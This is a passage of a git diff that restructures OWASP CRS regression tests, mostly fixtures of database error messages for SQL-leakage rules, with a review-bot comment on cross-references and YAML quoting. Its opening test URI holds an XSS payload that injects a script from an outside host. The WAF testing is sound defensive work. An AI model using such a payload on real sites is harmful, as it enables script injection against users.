[(]Total Score: " + - input: + dest_addr: 127.0.0.1 + method: GET + port: 80 + uri: '/get/demo/xss/xml/vuln.xml.php?input=setTimeout("top.frame2.location="javascript:(function+()+{var+x+=+document.createElement(\\"script\\");x.src+=+\\"//sdl.me/popup.js?//\\";document.childNodes\\[0\\].appendChild(x);}());"",1000)&//' + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + version: "HTTP/1.1" + output: + log_contains: "Inbound Anomaly Score Exceeded [(]Total Score: " 
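Review bot: The description of test_id 5 (the last entry of this hunk) still points at `949110-0`, a test that exists under neither the old `test_title` scheme nor the new `test_id` numbering; the request it duplicates is test_id 1, so while every entry in the file is being rewritten I would change the line to `desc: Test is basically identical to 949110-1 (see above) but here we assert that the scores are summed up and reported properly`. The other cross references (`941100-1`, `941100-4`, `920100-9`, `920100-10`) keep the rule-dash-number form, which only stays meaningful if that convention is written down somewhere for the new `rule_id` + `test_id` layout. On style, the re-indented `+` lines mix plain and quoted scalars for the same fields — `dest_addr: 127.0.0.1` and `log_contains: id "949110"` in tests 1, 2 and 5 versus `dest_addr: "127.0.0.1"` and `log_contains: "id \"949110\""` in tests 3 and 4; since all of these lines are new on the `+` side, normalizing them to the quoted form used by the other files in this diff would be cheap here.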
diff --git a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951110.yaml b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951110.yaml index b6df65d0c..8880834b0 100644 --- a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951110.yaml +++ b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951110.yaml @@ -1,28 +1,26 @@ --- meta: author: "azurit" - enabled: true - name: "951110.yaml" description: "Regression tests for rule 951110" +rule_id: 951110 tests: - - test_title: 951110-1 + - test_id: 1 desc: "Matching Microsoft Access SQL Information Leakage" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - uri: "/reflect" - data: |- - {"body":"[match sql-errors.data]the used select statements have different number of columns[/match]: [Microsoft][ODBC Microsoft Access Driver] Syntax error (missing operator) in query expression"} - output: - log_contains: "id \"951110\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + uri: "/reflect" + data: |- + {"body":"[match sql-errors.data]the used select statements have different number of columns[/match]: [Microsoft][ODBC Microsoft Access Driver] Syntax error (missing operator) in query expression"} + output: + log_contains: "id \"951110\"" 
diff --git a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951120.yaml b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951120.yaml index 1c9318bd6..0f6f70f3f 100644 --- a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951120.yaml +++ b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951120.yaml @@ -1,29 +1,26 @@ --- meta: author: "azurit" - enabled: true - name: "951120.yaml" description: "Regression tests for rule 951120" +rule_id: 951120 tests: - - test_title: 951120-1 + - test_id: 1 desc: "Matching Oracle SQL Information Leakage" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - uri: "/reflect" - data: |- - {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: SQL Error: ORA-00933: SQL command not properly ended"} - - output: - log_contains: "id \"951120\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + uri: "/reflect" + data: |- + {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: SQL Error: ORA-00933: SQL command not properly ended"} + output: + log_contains: "id \"951120\"" diff --git a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951130.yaml b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951130.yaml index a7c83eff3..04d9d75a2 100644 
--- a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951130.yaml +++ b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951130.yaml @@ -1,28 +1,26 @@ --- meta: author: "azurit" - enabled: true - name: "951130.yaml" description: "Regression tests for rule 951130" +rule_id: 951130 tests: - - test_title: 951130-1 + - test_id: 1 desc: "Matching DB2 SQL Information Leakage" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - uri: "/reflect" - data: |- - {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: DB2 SQL Error: SQLCODE=-104, SQLSTATE=42601, SQLERRMC=DECLARE"} - output: - log_contains: "id \"951130\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + uri: "/reflect" + data: |- + {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: DB2 SQL Error: SQLCODE=-104, SQLSTATE=42601, SQLERRMC=DECLARE"} + output: + log_contains: "id \"951130\"" diff --git a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951140.yaml b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951140.yaml index c55031406..2ade0e0ad 100644 --- a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951140.yaml +++ b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951140.yaml 
@@ -1,28 +1,26 @@ --- meta: author: "azurit" - enabled: true - name: "951140.yaml" description: "Regression tests for rule 951140" +rule_id: 951140 tests: - - test_title: 951140-1 + - test_id: 1 desc: "Matching EMC SQL Information Leakage" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - uri: "/reflect" - data: |- - {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: [DM_QUERY_E_SYNTAX]error: \"A Parser Error (syntax error) has occurred in the vicinity of: select * from dm_folder where folder in\""} - output: - log_contains: "id \"951140\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + uri: "/reflect" + data: |- + {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: [DM_QUERY_E_SYNTAX]error: \"A Parser Error (syntax error) has occurred in the vicinity of: select * from dm_folder where folder in\""} + output: + log_contains: "id \"951140\"" diff --git a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951150.yaml b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951150.yaml index 2e02f92f5..de3cb5a23 100644 --- a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951150.yaml +++ b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951150.yaml 
@@ -1,28 +1,26 @@ --- meta: author: "azurit" - enabled: true - name: "951150.yaml" description: "Regression tests for rule 951150" +rule_id: 951150 tests: - - test_title: 951150-1 + - test_id: 1 desc: "Matching firebird SQL Information Leakage" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - uri: "/reflect" - data: |- - {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: Dynamic SQL Error"} - output: - log_contains: "id \"951150\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + uri: "/reflect" + data: |- + {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: Dynamic SQL Error"} + output: + log_contains: "id \"951150\"" diff --git a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951160.yaml b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951160.yaml index 088e2d36f..cfbeb2a88 100644 --- a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951160.yaml +++ b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951160.yaml 
@@ -1,28 +1,26 @@ --- meta: author: "azurit" - enabled: true - name: "951160.yaml" description: "Regression tests for rule 951160" +rule_id: 951160 tests: - - test_title: 951160-1 + - test_id: 1 desc: "Matching Frontbase SQL Information Leakage" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - uri: "/reflect" - data: |- - {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: SQL-status: HY000 [FrontBase Inc.][FrontBase ODBC]Semantic error 217. Datatypes are not comparable or don't match. Semantic error 485. Near: SELECT DISTINCT * FROM SALES WHERE DATE>='2014-04-01';. Semantic error 485. Near: '2014-04-01'. Exception 363. Transaction rollback."} - output: - log_contains: "id \"951160\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + uri: "/reflect" + data: |- + {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: SQL-status: HY000 [FrontBase Inc.][FrontBase ODBC]Semantic error 217. Datatypes are not comparable or don't match. Semantic error 485. Near: SELECT DISTINCT * FROM SALES WHERE DATE>='2014-04-01';. Semantic error 485. Near: '2014-04-01'. Exception 363. Transaction rollback."} + output: + log_contains: "id \"951160\"" 
diff --git a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951170.yaml b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951170.yaml index 60ad4b95f..cc0faad55 100644 --- a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951170.yaml +++ b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951170.yaml @@ -1,28 +1,26 @@ --- meta: author: "azurit" - enabled: true - name: "951170.yaml" description: "Regression tests for rule 951170" +rule_id: 951170 tests: - - test_title: 951170-1 + - test_id: 1 desc: "Matching hsqldb SQL Information Leakage" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - uri: "/reflect" - data: |- - {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: at org.hsqldb.jdbc.JDBCDriver.connect(Unknown Source)"} - output: - log_contains: "id \"951170\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + uri: "/reflect" + data: |- + {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: at org.hsqldb.jdbc.JDBCDriver.connect(Unknown Source)"} + output: + log_contains: "id \"951170\"" diff --git a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951180.yaml b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951180.yaml index 7ac83ba06..a9b5c0d5d 100644 
--- a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951180.yaml +++ b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951180.yaml @@ -1,28 +1,26 @@ --- meta: author: "azurit" - enabled: true - name: "951180.yaml" description: "Regression tests for rule 951180" +rule_id: 951180 tests: - - test_title: 951180-1 + - test_id: 1 desc: "Matching informix SQL Information Leakage" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - uri: "/reflect" - data: |- - {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: Exception in thread \"main\" java.sql.SQLException: An illegal character has been found in the statement."} - output: - log_contains: "id \"951180\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + uri: "/reflect" + data: |- + {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: Exception in thread \"main\" java.sql.SQLException: An illegal character has been found in the statement."} + output: + log_contains: "id \"951180\"" diff --git a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951190.yaml b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951190.yaml index b1ca7c7b1..21e7d6d8a 100644 --- a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951190.yaml 
+++ b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951190.yaml @@ -1,28 +1,26 @@ --- meta: author: "azurit" - enabled: true - name: "951190.yaml" description: "Regression tests for rule 951190" +rule_id: 951190 tests: - - test_title: 951190-1 + - test_id: 1 desc: "Matching ingres SQL Information Leakage" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - uri: "/reflect" - data: |- - {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: [5000A] [Actian][Ingres ODBC Driver][Ingres]Delimited identifier starting with '' contains no valid characters. (6692) (SQLExecDirectW)"} - output: - log_contains: "id \"951190\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + uri: "/reflect" + data: |- + {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: [5000A] [Actian][Ingres ODBC Driver][Ingres]Delimited identifier starting with '' contains no valid characters. (6692) (SQLExecDirectW)"} + output: + log_contains: "id \"951190\"" diff --git a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951200.yaml b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951200.yaml index a190b55e2..ae89d41d8 100644 --- a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951200.yaml 
+++ b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951200.yaml @@ -1,28 +1,26 @@ --- meta: author: "azurit" - enabled: true - name: "951200.yaml" description: "Regression tests for rule 951200" +rule_id: 951200 tests: - - test_title: 951200-1 + - test_id: 1 desc: "Matching interbase SQL Information Leakage" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - uri: "/reflect" - data: |- - {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: Unexpected end of command in statement [SELECT * FROM INTO WHERE 'place'='xxxxxxx' AND 'yielddate' BETWEEN '01/11/2012' AND '29/11/2012''']."} - output: - log_contains: "id \"951200\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + uri: "/reflect" + data: |- + {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: Unexpected end of command in statement [SELECT * FROM INTO WHERE 'place'='xxxxxxx' AND 'yielddate' BETWEEN '01/11/2012' AND '29/11/2012''']."} + output: + log_contains: "id \"951200\"" diff --git a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951210.yaml b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951210.yaml index f65083eb9..740acf8f9 100644 --- a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951210.yaml 
+++ b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951210.yaml @@ -1,28 +1,26 @@ --- meta: author: "azurit" - enabled: true - name: "951210.yaml" description: "Regression tests for rule 951210" +rule_id: 951210 tests: - - test_title: 951210-1 + - test_id: 1 desc: "Matching maxDB SQL Information Leakage" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - uri: "/reflect" - data: |- - {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: Warning: maxdb_query(): -8004 POS(62) Constant must be compatible with column type and length"} - output: - log_contains: "id \"951210\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + uri: "/reflect" + data: |- + {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: Warning: maxdb_query(): -8004 POS(62) Constant must be compatible with column type and length"} + output: + log_contains: "id \"951210\"" diff --git a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951220.yaml b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951220.yaml index 18d37f411..b92a07a32 100644 --- a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951220.yaml +++ b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951220.yaml 
@@ -1,50 +1,46 @@ --- meta: author: "azurit, Xhoenix" - enabled: true - name: "951220.yaml" description: "Regression tests for rule 951220" +rule_id: 951220 tests: - - test_title: 951220-1 + - test_id: 1 desc: "Matching mssql SQL Information Leakage" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - uri: "/reflect" - data: |- - {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: PHP Warning: mssql_query(): message: Incorrect syntax near 's'. (severity 15) in /Volumes/Data/Users/username/Desktop/createXML.php on line 375"} - output: - log_contains: "id \"951220\"" - - - test_title: 951220-2 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + uri: "/reflect" + data: |- + {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: PHP Warning: mssql_query(): message: Incorrect syntax near 's'. 
(severity 15) in /Volumes/Data/Users/username/Desktop/createXML.php on line 375"} + output: + log_contains: "id \"951220\"" + - test_id: 2 desc: "Matching mssql SQL Information Leakage" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - uri: "/reflect" - data: |- - {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: Conversion failed when converting the varchar value 'secret' to data type int."} - output: - log_contains: "id \"951220\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + uri: "/reflect" + data: |- + {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: Conversion failed when converting the varchar value 'secret' to data type int."} + output: + log_contains: "id \"951220\"" diff --git a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951230.yaml b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951230.yaml index 972e41e9e..085ff639d 100644 --- a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951230.yaml +++ b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951230.yaml 
@@ -1,49 +1,46 @@ --- meta: author: "azurit, Xhoenix" - enabled: true - name: "951230.yaml" description: "Regression tests for rule 951230" +rule_id: 951230 tests: - - test_title: 951230-1 + - test_id: 1 desc: "Matching MySQL SQL Information Leakage" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - uri: "/reflect" - data: |- - {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: ERROR 1772 (HY000): Malformed GTID set specification 'secret_password'."} - output: - log_contains: "id \"951230\"" - - test_title: 951230-2 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + uri: "/reflect" + data: |- + {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: ERROR 1772 (HY000): Malformed GTID set specification 'secret_password'."} + output: + log_contains: "id \"951230\"" + - test_id: 2 desc: "Matching MySQL SQL Information Leakage" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - uri: 
"/reflect" - data: |- - {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: ERROR 1105 (HY000): XPATH syntax error: '\\secret'"} - output: - log_contains: "id \"951230\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + uri: "/reflect" + data: |- + {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: ERROR 1105 (HY000): XPATH syntax error: '\\secret'"} + output: + log_contains: "id \"951230\"" diff --git a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951240.yaml b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951240.yaml index f878fd171..be9ca63e3 100644 --- a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951240.yaml +++ b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951240.yaml 
@@ -1,49 +1,46 @@ --- meta: author: "azurit, Xhoenix" - enabled: true - name: "951240.yaml" description: "Regression tests for rule 951240" +rule_id: 951240 tests: - - test_title: 951240-1 + - test_id: 1 desc: "Matching PostgreSQL Information Leakage" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - uri: "/reflect" - data: |- - {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: Warning: pg_query(): supplied argument is not a valid PostgreSQL link resource in /var/www/sivusto/handler.php on line 56"} - output: - log_contains: "id \"951240\"" - - test_title: 951240-2 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + uri: "/reflect" + data: |- + {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: Warning: pg_query(): supplied argument is not a valid PostgreSQL link resource in 